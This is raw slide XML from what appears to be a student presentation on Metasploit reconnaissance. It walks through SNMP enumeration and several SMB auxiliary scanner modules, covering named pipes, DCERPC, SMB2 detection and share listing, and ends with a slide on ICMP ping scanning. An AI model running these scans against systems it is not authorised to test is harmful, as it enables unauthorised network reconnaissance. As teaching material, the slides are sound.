            <a:off x="457200" y="927650"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="594" name="Shape 594"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1404937"/>
            <a:ext cx="6934200" cy="2333625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Shape 595"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4085400" y="1486375"/>
            <a:ext cx="1624799" cy="1605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9" name="Shape 599"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Shape 60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lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>Bonus Task:Search SNMP, bringing up the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1800"/>
              <a:t>MIB (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Management Information Base</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1800"/>
              <a:t>) API. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>From there, run snmp_enum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 601"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="927650"/>
            <a:ext cx="3702600" cy="1660199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error: Database not connected or cache not built, using slow search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="110000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service postgresql start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="110000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>service metasploit start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="110000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update-rc.d postgresql </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7A0874"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="110000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update-rc.d metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="7A0874"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="602" name="Shape 602"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466120" y="927650"/>
            <a:ext cx="4220674" cy="1816350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Shape 603"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2656400"/>
            <a:ext cx="4724400" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Shape 604"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961700" y="4587475"/>
            <a:ext cx="2042400" cy="1605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605" name="Shape 605"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144450" y="3629012"/>
            <a:ext cx="5676900" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Shape 606"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464650" y="4587450"/>
            <a:ext cx="2384700" cy="3315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0" name="Shape 610"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Shape 611"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="129778"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>Bonus Task:Search SNMP, bringing up the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1800"/>
              <a:t>MIB (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Management Information Base</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1800"/>
              <a:t>) API. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800"/>
              <a:t>From there, run snmp_enum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Shape 612"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1710600"/>
            <a:ext cx="2077199" cy="516299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Theoretical </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="613" name="Shape 613"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2357812"/>
            <a:ext cx="3924300" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="614" name="Shape 614"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539500" y="2913300"/>
            <a:ext cx="5676750" cy="314500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="615" name="Shape 615"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="840527" y="1063377"/>
            <a:ext cx="6729224" cy="540625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="616" name="Shape 616"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769575" y="1807175"/>
            <a:ext cx="0" cy="427799"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Shape 617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339275" y="2226900"/>
            <a:ext cx="2077199" cy="516299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="618" name="Shape 618"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242100" y="2357850"/>
            <a:ext cx="0" cy="427799"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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2" name="Shape 622"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SMB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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8" name="Shape 628"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 629"/>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rPr lang="en"/>
              <a:t>To set up the attack, open Metasploit, then type ‘use auxiliary/scanner/smb/pipe_auditor’, and use ‘set RHOSTS’ to set the target IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Shape 630"/>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Setting Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="631" name="Shape 631"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21710" l="39937" r="7087" t="33152"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299925" y="2823050"/>
            <a:ext cx="4844075" cy="2320450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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5" name="Shape 635"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 636"/>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Named Pipes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 637"/>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rPr lang="en"/>
              <a:t>To run the exploit, simply type ‘run’. Providing a username and password using ‘set (SMBUser / SMBPass) (user / pass)’  will return much more information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="45111" l="39991" r="7151" t="40536"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3747608"/>
            <a:ext cx="9144000" cy="1395891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition>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2" name="Shape 642"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>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DCERPC Auditor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 644"/>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rPr lang="en"/>
              <a:t>To start, type ‘use auxiliary/scanner/smb/pipe_dcerpc_auditor’, set the IP with RHOSTS, and then ‘run’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21103" l="16306" r="41185" t="60667"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2938896"/>
            <a:ext cx="9144000" cy="2204603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>
  </p:transition>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9" name="Shape 649"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="Shape 650"/>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SMB2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape 651"/>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rPr lang="en"/>
              <a:t>‘Use auxiliary/scanner/smb/smb2’ will allow you you to scan for SMB 2 after setting the IP and typing ‘run’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="652" name="Shape 652"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21931" l="16538" r="30824" t="34776"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086975" y="2342799"/>
            <a:ext cx="6057024" cy="2800700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cut/>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6" name="Shape 656"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Shape 657"/>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SMB Shares</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Shape 658"/>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rPr lang="en"/>
              <a:t>‘use …./smb/smb_enumshares’ shows all SMB shares on the target IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="659" name="Shape 659"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20895" l="16189" r="30936" t="43890"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="873225" y="2373474"/>
            <a:ext cx="7397548" cy="2770024"/>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 name="Shape 77"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 79"/>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i="1" lang="en"/>
              <a:t>ICMP Echo Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-p, -l)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sends ICMP echo (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)  request to all hosts to see which are up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be parallelized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
